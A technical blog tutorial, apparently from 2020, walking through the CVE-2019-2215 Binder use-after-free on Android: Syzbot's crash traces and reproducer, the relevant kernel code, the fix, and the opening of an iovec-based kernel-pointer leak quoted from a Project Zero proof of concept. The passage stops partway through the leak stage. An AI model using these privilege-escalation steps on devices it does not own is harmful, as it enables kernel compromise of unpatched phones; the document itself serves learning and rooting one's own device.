Exploit CVE-2019-2215 vulnerability to gain root access on the Redmi Note 5 Pro (whyred) and others 

Posted on: Aug 23, 2020 9:52 PM UTC

Contents

In this article, I will show you how to exploit the CVE-2019-2215 vulnerability to gain root access on the Redmi Note 5 Pro (whyred) and other devices.
There are already good articles about this exploit, but I'm writing this for three reasons:
  • they may be a bit hard to follow for newcomers
  • they didn't work on the Redmi Note 5 Pro
  • I provide step-by-step explanations about the whole process
Here I will reformulate in hopefully simpler terms, but the articles in the references section are really worth reading.
My goal here is to allow any person motivated enough to fully understand this exploit. And if they manage to root their device with this that's even better.

Remarks

This article is quite long and technical. I may have left errors.
I have done my best to make it something understandable, this includes the absence of tests in the pieces of code in the article, but you will find them in the code on Github.
I also skipped certain parts and explanations that were not essential or explained elsewhere.
Just tell me if anything seems off to you.

What is CVE-2019-2215 ?

You can find a description of CVE-2019-2215 on the NIST website:
A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel.
No user interaction is required to exploit this vulnerability, however exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application.
Below are short explanations to understand these sentences.
use-after-free (UAF):
An object is allocated, used and finally freed (see memory allocation).
But a reference to a part of it still exists somewhere and is used to access it afterwards.
binder.c:
Binder is a Linux component actually used in Android, in order to send messages between processes among others.
elevation of privilege from an application to the Linux Kernel:
With no special rights you can gain kernel access.
The bug was first discovered by Syzbot (a syzkaller instance, i.e. a kind of Linux bug digger bot) in November 2017.
It was then fixed in February 2018 but not included in an Android monthly security bulletin until the October 2019 one.
This article is divided in 6 parts:
  • understand the vulnerability
  • leak kernel data
  • perform an arbitrary kernel write
  • perform an arbitrary kernel read without writing over addr_limit
  • become root and disable the security
  • apply the exploit on the Redmi Note 5 Pro and how to port it to other phones

Understand the vulnerability

Binder and Epoll

Binder

Binder is a rewrite of OpenBinder by Google and is used in Android to send messages between processes and other things we don't really need to address here.
You will find good resources on Binder here.
A binder_thread is a structure representing your thread in the Binder driver.
For reference, below is the definition of the binder_thread structure for my kernel.
My kernel is 4.4.78-perf+ so I downloaded the Android kernel source code, went to the 4.4.78 version and quickly found it.
linux/drivers/android/binder.c
struct binder_thread { struct binder_proc *proc; struct rb_node rb_node; struct list_head waiting_thread_node; int pid; int looper; bool looper_need_return; struct binder_transaction *transaction_stack; struct list_head todo; struct binder_error return_error; struct binder_error reply_error; wait_queue_head_t wait; struct binder_stats stats; atomic_t tmp_ref; bool is_dead; struct task_struct *task; };

Epoll

Wikipedia describes it well:
Epoll is a Linux kernel system call for a scalable I/O event notification mechanism.
Its function is to monitor multiple file descriptors to see whether I/O is possible on any of them.

What Syzbot did in November 2017 ?

Syzbot triggered a bug in November 2017, but didn't manage to create a "reproducer", i.e. a piece of code that reproduces the behavior:
Unfortunately, I don't have any reproducer for this bug yet.
This was done two weeks later and in its email announcing this it gives four important pieces of information.
Note: I deleted some KASAN-related lines.
  1. The memory allocation call stack
Allocated by task 3086:
  kmem_cache_alloc_trace+0x136/0x750 mm/slab.c:3613
  kmalloc include/linux/slab.h:499 [inline]
  kzalloc include/linux/slab.h:688 [inline]
  binder_get_thread+0x1cf/0x870 drivers/android/binder.c:4184
  binder_poll+0x8c/0x390 drivers/android/binder.c:4286
  ep_item_poll.isra.10+0xec/0x320 fs/eventpoll.c:884
  ep_insert+0x6a3/0x1b10 fs/eventpoll.c:1455
  SYSC_epoll_ctl fs/eventpoll.c:2106 [inline]
  SyS_epoll_ctl+0x12e4/0x1ab0 fs/eventpoll.c:1992
  do_syscall_32_irqs_on arch/x86/entry/common.c:327 [inline]
  do_fast_syscall_32+0x3ee/0xf9d arch/x86/entry/common.c:389
  entry_SYSENTER_compat+0x51/0x60 arch/x86/entry/entry_64_compat.S:125
  1. The memory release call stack
Freed by task 3086:
  __cache_free mm/slab.c:3491 [inline]
  kfree+0xca/0x250 mm/slab.c:3806
  binder_free_thread drivers/android/binder.c:4211 [inline]
  binder_thread_dec_tmpref+0x27f/0x310 drivers/android/binder.c:1808
  binder_thread_release+0x27d/0x540 drivers/android/binder.c:4275
  binder_ioctl+0xc05/0x141a drivers/android/binder.c:4492
  C_SYSC_ioctl fs/compat_ioctl.c:1473 [inline]
  compat_SyS_ioctl+0x151/0x2a30 fs/compat_ioctl.c:1419
  do_syscall_32_irqs_on arch/x86/entry/common.c:327 [inline]
  do_fast_syscall_32+0x3ee/0xf9d arch/x86/entry/common.c:389
  entry_SYSENTER_compat+0x51/0x60 arch/x86/entry/entry_64_compat.S:125
  1. The call trace of the bug
Call Trace:
  __lock_acquire+0x465e/0x47f0 kernel/locking/lockdep.c:3378
  lock_acquire+0x1d5/0x580 kernel/locking/lockdep.c:4004
  __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline]
  _raw_spin_lock_irqsave+0x96/0xc0 kernel/locking/spinlock.c:159
  remove_wait_queue+0x81/0x350 kernel/sched/wait.c:50
  ep_remove_wait_queue fs/eventpoll.c:595 [inline]
  ep_unregister_pollwait.isra.7+0x18c/0x590 fs/eventpoll.c:613
  ep_free+0x13f/0x320 fs/eventpoll.c:830
  ep_eventpoll_release+0x44/0x60 fs/eventpoll.c:862
  __fput+0x333/0x7f0 fs/file_table.c:210
  ____fput+0x15/0x20 fs/file_table.c:244
  task_work_run+0x199/0x270 kernel/task_work.c:113
  exit_task_work include/linux/task_work.h:22 [inline]
  do_exit+0x9bb/0x1ae0 kernel/exit.c:865
  do_group_exit+0x149/0x400 kernel/exit.c:968
  SYSC_exit_group kernel/exit.c:979 [inline]
  SyS_exit_group+0x1d/0x20 kernel/exit.c:977
  do_syscall_32_irqs_on arch/x86/entry/common.c:327 [inline]
  do_fast_syscall_32+0x3ee/0xf9d arch/x86/entry/common.c:389
  entry_SYSENTER_compat+0x51/0x60 arch/x86/entry/entry_64_compat.S:125
  1. The C reproducer
reproducer1.c
// ... long r[8]; void loop() { memset(r, -1, sizeof(r)); r[0] = syscall(__NR_mmap, 0x20000000ul, 0xfff000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); memcpy((void*)0x20001000, "\x2f\x64\x65\x76\x2f\x62\x69\x6e\x64\x65\x72\x23\x00", 13); r[2] = syz_open_dev(0x20001000ul, 0x0ul, 0x0ul); r[3] = syscall(__NR_epoll_create, 0x10001ul); *(uint32_t*)0x20336ff4 = (uint32_t)0x2019; *(uint64_t*)0x20336ff8 = (uint64_t)0x0; r[6] = syscall(__NR_epoll_ctl, r[3], 0x1ul, r[2], 0x20336ff4ul); r[7] = syscall(__NR_ioctl, r[2], 0x40046208ul, 0x0ul); } int main() { loop(); return 0; }
Using sys/mman.h, man mmap, man epoll_ctl, include/uapi/linux/eventpoll.h and ioctl defines, this code can be rewritten as the following (remember Syzbot is a fuzzer):
reproducer2.c
#define BINDER_THREAD_EXIT 0x40046208 int main() { struct epoll_event event = { .events = EPOLLRDHUP | EPOLLHUP | EPOLLERR | EPOLLIN, .data = NULL }; int binder_fd = open("/dev/binder", O_RDONLY); int epfd = epoll_create(0x10001); // useless parameter, see `man epoll_create` epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event); ioctl(binder_fd, BINDER_THREAD_EXIT, NULL); return 0; }

Explanations of the bug

Let's understand what Syzbot did.
  1. Set the system up
  • open the binder driver
  • create an epoll instance
  1. The memory allocation
  • add the binder interface to the epoll_event
reproducer2.c
epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event);
linux/fs/eventpoll.c
SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd, struct epoll_event __user *, event) { //... case EPOLL_CTL_ADD: if (!epi) { epds.events |= POLLERR | POLLHUP; error = ep_insert(ep, &epds, tf.file, fd, full_check); } else error = -EEXIST; if (full_check) clear_tfile_check_list(); break; //... }
In ep_insert there are two interesting things:
  • set ep_ptable_queue_proc as the callback used when the wait queue is added
    This is done with the init_poll_funcptr call and this puts ep_ptable_queue_proc in the _qproc member of the poll table
  • poll the binder driver using ep_item_poll which actually calls binder_poll behind the scenes, using the binder file descriptor previously obtained
linux/fs/eventpoll.c
/* * Must be called with "mtx" held. */ static int ep_insert(struct eventpoll *ep, struct epoll_event *event, struct file *tfile, int fd, int full_check) { //... struct ep_pqueue epq; //... /* Initialize the poll table using the queue callback */ epq.epi = epi; init_poll_funcptr(&epq.pt, ep_ptable_queue_proc); /* * Attach the item to the poll hooks and get current event bits. * We can safely use the file* here because its usage count has * been increased by the caller of this function. Note that after * this operation completes, the poll callback can start hitting * the new item. */ revents = ep_item_poll(epi, &epq.pt); //... }
linux/include/linux/poll.h
static inline void init_poll_funcptr(poll_table *pt, poll_queue_proc qproc) { pt->_qproc = qproc; pt->_key = ~0UL; /* all events enabled */ }
The binder_poll function does two things:
  • get a reference to the binder thread using thread = binder_get_thread(proc)
The object has not been created yet though, that's the role of binder_get_thread to allocate it if needed.
linux/drivers/android/binder.c
static unsigned int binder_poll(struct file *filp, struct poll_table_struct *wait) { struct binder_proc *proc = filp->private_data; struct binder_thread *thread = NULL; bool wait_for_proc_work; thread = binder_get_thread(proc); // <-- get `binder_thread` reference binder_inner_proc_lock(thread->proc); thread->looper |= BINDER_LOOPER_STATE_POLL; wait_for_proc_work = binder_available_for_proc_work_ilocked(thread); binder_inner_proc_unlock(thread->proc); if (binder_has_work(thread, wait_for_proc_work)) return POLLIN; poll_wait(filp, &thread->wait, wait); // <-- poll the queue if (binder_has_thread_work(thread)) return POLLIN; return 0; }
linux/drivers/android/binder.c
static struct binder_thread *binder_get_thread(struct binder_proc *proc) { struct binder_thread *thread; struct binder_thread *new_thread; binder_inner_proc_lock(proc); thread = binder_get_thread_ilocked(proc, NULL); binder_inner_proc_unlock(proc); if (!thread) { new_thread = kzalloc(sizeof(*thread), GFP_KERNEL); // <-- `binder_thread` allocation if (new_thread == NULL) return NULL; binder_inner_proc_lock(proc); thread = binder_get_thread_ilocked(proc, new_thread); binder_inner_proc_unlock(proc); if (thread != new_thread) kfree(new_thread); } return thread; }
The second thing that binder_poll does is polling the queue with the poll_wait call.
linux/include/linux/poll.h
static inline void poll_wait(struct file * filp, wait_queue_head_t * wait_address, poll_table *p) { if (p && p->_qproc && wait_address) p->_qproc(filp, wait_address, p); // <- pt->_qproc has been set to // `ep_ptable_queue_proc` in `ep_insert` }
linux/fs/eventpoll.c
/* * This is the callback that is used to add our wait queue to the * target file wakeup lists. */ static void ep_ptable_queue_proc(struct file *file, wait_queue_!head_t *whead, poll_table *pt) { struct epitem *epi = ep_item_from_epqueue(pt); struct eppoll_entry *pwq; if (epi->nwait >= 0 && (pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL))) { init_waitqueue_func_entry(&pwq->wait, ep_poll_callback); pwq->whead = whead; pwq->base = epi; add_wait_queue(whead, &pwq->wait); list_add_tail(&pwq->llink, &epi->pwqlist); epi->nwait++; } else { /* We have to signal that an error occurred */ epi->nwait = -1; } }
linux/include/linux/wait.h
static inline void __add_wait_queue(wait_queue_head_t *head, wait_queue_t *new) { list_add(&new->task_list, &head->task_list); }
linux/include/linux/wait.h
/** * list_add - add a new entry * @new: new entry to be added * @head: list head to add it after * * Insert a new entry after the specified head. * This is good for implementing stacks. */ static inline void list_add(struct list_head *new, struct list_head *head) { __list_add(new, head, head->next); }
linux/include/linux/wait.h
/* * Insert a new entry between two known consecutive entries. * * This is only for internal list manipulation where we know * the prev/next entries already! */ #ifndef CONFIG_DEBUG_LIST static inline void __list_add(struct list_head *new, struct list_head *prev, struct list_head *next) { next->prev = new; new->next = next; new->prev = prev; prev->next = new; } #else extern void __list_add(struct list_head *new, struct list_head *prev, struct list_head *next); #endif
linux/fs/eventpoll.c
struct eppoll_entry { /* List header used to link this structure to the "struct epitem" */ struct list_head llink; /* The "base" pointer is set to the container "struct epitem" */ struct epitem *base; /* * Wait queue item that will be linked to the target file wait * queue head. */ wait_queue_t wait; /* The wait queue head that linked the "wait" wait queue item */ wait_queue_head_t *whead; };
So finally the parts of the allocation process we are interested in are the following:
c
// allocation of binder_thread thread = kzalloc(sizeof(*thread), GFP_KERNEL); // poll the wait queue... ep_ptable_queue_proc(_, &thread->wait, _); // | // v // ...which create an eppoll_entry and fill it pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL); pwq->whead = &thread->wait; list_add(&pwq->wait->task_list, &pwq->whead->task_list);
  1. The memory release
As a reminder, here is the memory release stack:
  kfree+0xca/0x250 mm/slab.c:3806
  binder_free_thread drivers/android/binder.c:4211 [inline]
  binder_thread_dec_tmpref+0x27f/0x310 drivers/android/binder.c:1808
  binder_thread_release+0x27d/0x540 drivers/android/binder.c:4275
  binder_ioctl+0xc05/0x141a drivers/android/binder.c:4492
The first binder function in the stack is binder_ioctl, which directly comes from the reproducer ioctl call.
The rest is straightforward:
reproducer2.c
ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
linux/drivers/android/binder.c
static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) { //... case BINDER_THREAD_EXIT: binder_thread_release(proc, thread); thread = NULL; break; //... }
linux/drivers/android/binder.c
static int binder_thread_release(struct binder_proc *proc, struct binder_thread *thread) { //... binder_release_work(proc, &thread->todo); binder_thread_dec_tmpref(thread); return active_transactions; //... }
linux/drivers/android/binder.c
static void binder_thread_dec_tmpref(struct binder_thread *thread) { binder_inner_proc_lock(thread->proc); atomic_dec(&thread->tmp_ref); if (thread->is_dead && !atomic_read(&thread->tmp_ref)) { binder_inner_proc_unlock(thread->proc); binder_free_thread(thread); return; } binder_inner_proc_unlock(thread->proc); }
linux/drivers/android/binder.c
static void binder_free_thread(struct binder_thread *thread) { BUG_ON(!list_empty(&thread->todo)); binder_stats_deleted(BINDER_STAT_THREAD); binder_proc_dec_tmpref(thread->proc); put_task_struct(thread->task); kfree(thread); }
After this kfree call, the binder_thread memory is freed.
In order to have the structure in mind, here is what we just freed:
thread+0x00+0x04+0x08+0x0c
+0x000
···
+0x0a0wait_queue_head_t wait
+0x0b0
···
+0x190struct task_struct *task
Memory footprint of the binder_thread object
  1. The use-after-free bug
What Syzbot reported was a use-after-free (UAF), i.e. an access to a memory area previously freed, here the binder_thread object.
The trace of the UAF:
_raw_spin_lock_irqsave+0x96/0xc0 kernel/locking/spinlock.c:159
remove_wait_queue+0x81/0x350 kernel/sched/wait.c:50
ep_remove_wait_queue fs/eventpoll.c:595 [inline]
ep_unregister_pollwait.isra.7+0x18c/0x590 fs/eventpoll.c:613
ep_free+0x13f/0x320 fs/eventpoll.c:830
ep_eventpoll_release+0x44/0x60 fs/eventpoll.c:862
...
SyS_exit_group+0x1d/0x20 kernel/exit.c:977
At the end of the program, SyS_exit_group is called to exit the threads which implies releasing the event poll done in ep_eventpoll_release.
linux/fs/eventpoll.c
static int ep_eventpoll_release(struct inode *inode, struct file *file) { struct eventpoll *ep = file->private_data; if (ep) ep_free(ep); return 0; }
linux/fs/eventpoll.c
static void ep_free(struct eventpoll *ep) { // ... /* * Walks through the whole tree by unregistering poll callbacks. */ for (rbp = rb_first(&ep->rbr); rbp; rbp = rb_next(rbp)) { epi = rb_entry(rbp, struct epitem, rbn); ep_unregister_pollwait(ep, epi); cond_resched(); } // ... }
linux/fs/eventpoll.c
/* * This function unregisters poll callbacks from the associated file * descriptor. Must be called with "mtx" held (or "epmutex" if called from * ep_free). */ static void ep_unregister_pollwait(struct eventpoll *ep, struct epitem *epi) { struct list_head *lsthead = &epi->pwqlist; struct eppoll_entry *pwq; while (!list_empty(lsthead)) { pwq = list_first_entry(lsthead, struct eppoll_entry, llink); list_del(&pwq->llink); ep_remove_wait_queue(pwq); kmem_cache_free(pwq_cache, pwq); } }
linux/fs/eventpoll.c
static void ep_remove_wait_queue(struct eppoll_entry *pwq) { wait_queue_head_t *whead; rcu_read_lock(); /* If it is cleared by POLLFREE, it should be rcu-safe */ whead = rcu_dereference(pwq->whead); if (whead) remove_wait_queue(whead, &pwq->wait); rcu_read_unlock(); }
linux/kernel/sched/wait.c
void remove_wait_queue(wait_queue_head_t *q, wait_queue_t *wait) { unsigned long flags; spin_lock_irqsave(&q->lock, flags); __remove_wait_queue(q, wait); spin_unlock_irqrestore(&q->lock, flags); }
linux/include/linux/wait.h
struct __wait_queue_head { spinlock_t lock; struct list_head task_list; }; typedef struct __wait_queue_head wait_queue_head_t;
As before, I will print an oversimplified pseudo-code to better see what happens:
c
ep_eventpoll_release(_, _); // | // v ep_free(ep); // | // v ep_unregister_pollwait(ep, epi); // | // v ep_remove_wait_queue(pwq); // pwq is an eppoll_entry // | // v remove_wait_queue(pwq->whead, &pwq->wait); // | // v spin_lock_irqsave(&pwq->whead->lock, _);
Ok, so this spin_lock_irqsave call is where the UAF happens.
This function tries to acquire a lock at address &pwq->whead->lock.
Now let's find its value to understand the problem.
In the earlier allocation chapter, we found where the eppoll_entry was created by Syzbot's reproducer:
c
// `binder_thread` allocation thread = kzalloc(sizeof(*thread), GFP_KERNEL); // `eppoll_entry` allocation pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL); // set the `whead` value to &thread->wait pwq->whead = &thread->wait;
So the spin_lock_irqsave call is actually equivalent to:
c
spin_lock_irqsave(&thread->wait.lock, _);
thread+0x00+0x04+0x08+0x0c
+0x000
···
+0x0a0spinlock_t lockstruct list_head task_list (first half)
+0x0b0struct list_head task_list (second half)
···
+0x190struct task_struct *task
Memory footprint of the binder_thread object
Using the memory table, we can see it uses the address thread + 0xa0, which has been freed in the BINDER_THREAD_EXIT ioctl call above.
Reading this freed memory is what triggers the KASAN crash.
The patch applied shortly after the Syzbot discovery consists of four lines in binder_thread_release that remove the wait queue from the epoll event:
diff --git a/drivers/android/binder.c b/drivers/android/binder.c
index 778caed570c6..26a66da72f02 100644
--- a/drivers/android/binder.c
+++ b/drivers/android/binder.c
@@ -4365,6 +4365,18 @@  static int binder_thread_release(struct binder_proc *proc,
    if (t)
      spin_lock(&t->lock);
  }
+
+ /*
+  * If this thread used poll, make sure we remove the waitqueue
+  * from any epoll data structures holding it with POLLFREE.
+  * waitqueue_active() is safe to use here because we're holding
+  * the inner lock.
+  */
+ if ((thread->looper & BINDER_LOOPER_STATE_POLL) &&
+     waitqueue_active(&thread->wait)) {
+   wake_up_poll(&thread->wait, POLLHUP | POLLFREE);
+ }
+
  binder_inner_proc_unlock(thread->proc);
 
  if (send_reply)

Leaking some data

The fact that the program crashes is only true when KASAN is active as it is its role. On normal Linux builds this would likely go unnoticed.
Let's see what happens on a normal build.
Instead of crashing, spin_lock_irqsave would try to acquire the lock.
The CPU would wait until the value at thread + 0xa0 is 0, if it's not already 0, then everything would continue normally.
linux/kernel/sched/wait.c
void remove_wait_queue(wait_queue_head_t *q, wait_queue_t *wait) { unsigned long flags; spin_lock_irqsave(&q->lock, flags); __remove_wait_queue(q, wait); spin_unlock_irqrestore(&q->lock, flags); }
The next call is __remove_wait_queue:
linux/include/linux/wait.h
static inline void __remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old) { list_del(&old->task_list); }
linux/include/linux/list.h
#ifndef CONFIG_DEBUG_LIST static inline void list_del(struct list_head *entry) { __list_del(entry->prev, entry->next); entry->next = LIST_POISON1; entry->prev = LIST_POISON2; } #else extern void list_del(struct list_head *entry); // <-- if CONFIG_DEBUG_LIST is defined, then `list_del` is defined somewhere else #endif
linux/include/linux/list.h
/* * Delete a list entry by making the prev/next entries * point to each other. * * This is only for internal list manipulation where we know * the prev/next entries already! */ static inline void __list_del(struct list_head * prev, struct list_head * next) { next->prev = prev; WRITE_ONCE(prev->next, next); }
And once __remove_wait_queue is done, you can check that there is nothing much left to be executed in ep_eventpoll_release.
I am again writing an oversimplified version of the allocation and of what is executed after the lock is acquired.
c
// allocation of binder_thread thread = kzalloc(sizeof(*thread), GFP_KERNEL); // let's call thread->wait.task_list TWTL // TWTL only has one element: "itself" thread->wait.task_list->next = thread->wait.task_list; // TWTL->next = &TWTL thread->wait.task_list->prev = thread->wait.task_list; // TWTL->prev = &TWTL // poll the wait queue... ep_ptable_queue_proc(_, &thread->wait, _); // | // v // ...which create an eppoll_entry and fill it pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL); pwq->wait->private = NULL; pwq->wait->flags = 0; pwq->wait->task_list = NULL; pwq->wait->func = ep_poll_callback; // the queue head is the `wait` queue head of `binder_thread` pwq->whead = &thread->wait; // then the epoll event task_list (PWTL) in added in TWTL // from TWTL -> TTLnext // to TWTL -> PWTL -> TTLnext thread->wait.task_list->next->prev = &pwq->wait->task_list; // TWTL->next->prev = &PWTL // (so TWTL->prev = &PWTL) pwq->wait->task_list->next = &thread->wait.task_list->next; // PWTL->next = &TWTL->next // (so PWTL->next = &TWTL) pwq->wait->task_list->prev = &thread->wait.task_list; // PWTL->prev = &TWTL thread->wait.task_list->next = &pwq->wait->task_list; // TWTL->next = &PWTL /**********************************/ // End of allocation /**********************************/ // Start of the `ep_unregister_pollwait` call /**********************************/ // some cleaning we saw previously remove_wait_queue(_, &pwq->wait); // | // v __remove_wait_queue(_, &pwq->wait); // | // v list_del(&pwq->wait->task_list); // | // v pwq->wait->task_list->next = LIST_POISON1; // cleaning PWTL, don't care pwq->wait->task_list->prev = LIST_POISON2; // cleaning PWTL, don't care pwq->wait->task_list->next->prev = &pwq->wait->task_list->prev; // PWTL->next->prev = &PWTL->prev; pwq->wait->task_list->prev->next, &pwq->wait->task_list->next; // PWTL->prev->next = &PWTL->next; // | // v // but we know that PWTL->next = &TWTL and PWTL->prev = &TWTL // which actually gives us TWTL->prev = &TWTL; TWTL->next = &TWTL; // as expected, since we only deleted one of the two elements of a linked list
In case not everything makes sense, I'll draw the memory again.
thread+0x00+0x04+0x08+0x0c
+0x000
···
+0x0a0thread->wait.lock
thread->wait.task_list.next
= &TWTL
= &thread->wait.task_list
= thread + 0xa8
+0x0b0
thread->wait.task_list.prev
= &TWTL
= &thread->wait.task_list
= thread + 0xa8
···
+0x190struct task_struct *task
After the binder_thread kzalloc
thread+0x00+0x04+0x08+0x0c
+0x000
···
+0x0a0thread->wait.lock
thread->wait.task_list.next
= &PWTL
+0x0b0
thread->wait.task_list.prev
= &PWTL
···
+0x190struct task_struct *task
After the epoll initialization
thread+0x00+0x04+0x08+0x0c
+0x000
···
+0x0a0thread->wait.lock
thread->wait.task_list.next
= &TWTL
= &thread->wait.task_list
= thread + 0xa8
+0x0b0
thread->wait.task_list.prev
= &TWTL
= &thread->wait.task_list
= thread + 0xa8
···
+0x190struct task_struct *task
After the ep_unregister_pollwait call
All of this can be resumed in a simple sentence: when you open the binder driver, add it to an epoll and close the binder thread, then if *(thread + 0xa0) is 0, thread + 0xa8 is written twice in a freed memory: at thread + 0xa8 and at thread + 0xb0.

What to do with an UAF ?

Now that we covered the principle of the bug and presumably triggered it, it is time to wonder what we can do with it.
An UAF allows the attacker to do many things depending of the program and its structure.
Here we saw that we made the kernel write a kernel pointer (twice) in an unallocated place.
A kernel pointer is nice to have as it can give you access to some useful objects in memory.
Knowing that the kernel is leaking a kernel pointer, our goal is to get it.
First of all, the leaked data is currently written in an uninitialized place in RAM so it may be overwritten any time now.
In order to avoid this, we make the kernel re-allocate the same spot. Of course you can't directly ask it to do that, but the kernel follows some rules to allocate memory so as to optimize things out.
For example, if the kernel allocates a memory block with a size close to the size of a recently freed memory, there is a good chance it will be the same.
Note that the type of memory is important here, though: if the kernel has recently freed 300 bytes of kernel memory and right after that you claim 300 bytes, your allocated memory would be in user space and will never be at the same spot.
You have to make the kernel itself re-allocate something on top of the freed memory.
Then you need to extract the data of this kernel-allocated object to leak the data.
We will look at how this is done in Maddie Stone's Pixel 2 PoC, the method she used is using vectored I/O.

Vectored I/O

I will directly quote Wikipedia on this one:
Vectored I/O, also known as scatter/gather I/O, is a method of input and output by which a single procedure call sequentially reads data from multiple buffers and writes it to a single data stream, or reads data from a data stream and writes it to multiple buffers, as defined in a vector of buffers.
In this process, each buffer is represented by an iovec object that simply gives a pointer to the buffer and its size.
linux/sys/uio.h
struct iovec { void *iov_base; size_t iov_len; }
To make things simple, you create an array of iovecs, you call one of the functions working on it (e.g. writev), this makes the kernel load the array in its memory and validate the addresses (e.g. to deny an unprivileged user trying to read or write kernel memory) and finally the kernel runs the function.
The usual functions used with iovecs are writev to make the kernel write data to the caller (gather), readv to make the other way around (scatter) and recvmsg to conveniently receive a predefined size of data.

UAF + iovec

The intent is to use iovecs to leak data. The object that is re-allocated on the freed memory of the binder_thread will be the array of iovecs.
To receive data from the vectored I/O we will use a pipe plugged to it.
To find out what to do next, let's see the memory once again and calculate some things.
offsetof(struct binder_thread, wait) = 0xa0
sizeof(struct iovec) = sizeof(void*) + sizeof(size_t) = 0x10
sizeof(struct binder_thread) = 0x198

sizeof(struct binder_thread) = 25 * sizeof(struct iovec) + 8
thread
kiovecs
+0x00+0x04+0x08+0x0c
+0x000
struct binder_proc *proc
kiovecs[0].iov_base
struct rb_node (uint64_t #0)
kiovecs[0].iov_len
···
+0x0a0
thread->wait.lock
kiovecs[10].iov_base
thread->wait.task_list.next
kiovecs[10].iov_len
+0x0b0
thread->wait.task_list.prev
kiovecs[11].iov_base
kiovecs[11].iov_len
···
···
kiovecs[24].iov_len
+0x190struct task_struct *task
After the epoll initialization
kiovecs is for kernel iovecs
In light grey: the freed, overwritten binder_thread
In blue: the kiovecs
As you can see, with an array of 25 iovec structures, we cover 400 out of 408 original bytes of the binder_thread.
This is close enough for the kernel to allocate them in the same spot.
Here is a reminder of the UAF we observed above:
thread + 0xa8 is written twice in a freed memory: at thread + 0xa8 and thread + 0xb0
And that is what should happen when we trigger the UAF:
thread
kiovecs
+0x00+0x04+0x08+0x0c
+0x000
struct binder_proc *proc
kiovecs[0].iov_base
struct rb_node (uint64_t #0)
kiovecs[0].iov_len
···
+0x0a0
thread->wait.lock
kiovecs[10].iov_base
thread->wait.task_list.next
kiovecs[10].iov_len
kiovecs + 0xa8
+0x0b0
thread->wait.task_list.prev
kiovecs[11].iov_base
kiovecs + 0xa8
kiovecs[11].iov_len
···
···
kiovecs[24].iov_len
+0x190struct task_struct *task
The expected effect of the UAF
This means that thanks to the UAF messing with the iovecs data, it looks like we can make the kernel think that thread + 0xa8 is a buffer address it needs to read from. That would then send kernel data to user space.
There are still three things to take care of:
  1. How to have a correct value for the spinlock at thread + 0xa0?
The spinlock value seen by spin_lock_irqsave is what has been overwritten by kiovecs[10].iov_base.
We also said that the spinlock needs to be 0 for it not to deadlock.
Hopefully there's a trick: the spinlock takes 8 bytes in the struct binder_thread but it's actually using only 4. The rest only aligns data.
This means that any value of kiovecs[10].iov_base that has its 4 lowest bytes set to 0 allows the spinlock to be acquired.
And this is easy to ensure, like in the Project Zero PoC:
project_zero_poc.c
dummy_page_4g_aligned = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
  1. How to trigger the UAF without exiting the program?
In the Syzbot bug it was the exiting of the program that called ep_eventpoll_release and ultimately caused the UAF.
There are other ways to call ep_eventpoll_release though: deleting the thread with epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event) calls ep_remove which then calls ep_unregister_pollwait and then you can recognize the path we saw earlier.
linux/fs/eventpoll.c
SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd, struct epoll_event __user *, event) { //... case EPOLL_CTL_DEL: if (epi) error = ep_remove(ep, epi); else error = -ENOENT; break; //... }
linux/fs/eventpoll.c
/* * Removes a "struct epitem" from the eventpoll RB tree and deallocates * all the associated resources. Must be called with "mtx" held. */ static int ep_remove(struct eventpoll *ep, struct epitem *epi) { // ... ep_unregister_pollwait(ep, epi); // ... return 0; }
  1. How would the timing work?
    The reading will be done by vectored I/O, reading a pipe.
    Consider this:
modified_project_zero_poc.c
// creating the pipe int pipefd[2]; struct iovec iovecs[25]; memset(iovecs, 0, sizeof(iovecs)); iovecs[10].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */ iovecs[10].iov_len = 0x1000; /* wq->task_list->next */ iovecs[11].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */ iovecs[11].iov_len = 0x1000;
If we set the iovecs up and read all the content at once we would get 0x1000 bytes from dummy_page_4g_aligned and 0x1000 bytes from 0xDEADBEEF.
Instead, we will use a property of iovecs: they block when the buffer on the other end is full (or empty, depending on the direction).
So with the iovecs above, if we make the iovecs write to the buffer with writev(pipefd[1], iovecs, 25) with a pipe buffer of 0x1000 bytes, then 2 read calls will have to be done:
  • read(pipefd[0], buffer, 0x1000) -> dummy_page_4g_aligned to dummy_page_4g_aligned + 0x1000
  • read(pipefd[0], buffer, 0x1000) -> 0xDEADBEEF to 0xDEADBEEF + 0x1000
Meanwhile, the writev call is blocked until everything has been sent to the buffer, i.e. at the end of the first read call.
That immediately hints on creating another thread, and this is actually something that is absolutely needed.
Indeed, the writev is the call that makes the kernel copy the iovecs into kiovecs after having verified that all the iovecs[x].iov_base were in the user space.
That implies that the UAF (i.e. the rewriting of kiovecs[11].iov_base) must occur after the writev call, but as writev is blocking you can't do it in the same process.
The second process will have to first trigger the UAF with the ioctl call (thus overwriting kiovecs[11].iov_base with thread + 0xa8) and then read 0x1000 bytes from the buffer.
This will make loading 0x1000 more bytes (the last ones, from kiovecs[11].iov_base) of the kiovecs content into the buffer, thus releasing the writev call of the first thread.
The final process is this:
  • Parent: writev(pipefd[1], iovecs, 25) -> load the iovecs into the kernel memory, verify the addresses and load the first 0x1000 bytes into the buffer, i.e. everything from kiovecs[0] to kiovecs[10] fully included
  • Parent process is blocked as the buffer is full
  • Child: epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event) which triggers UAF, kiovecs[10].iov_len (already used) and kiovecs[11].iov_base now equals thread + 0xa8
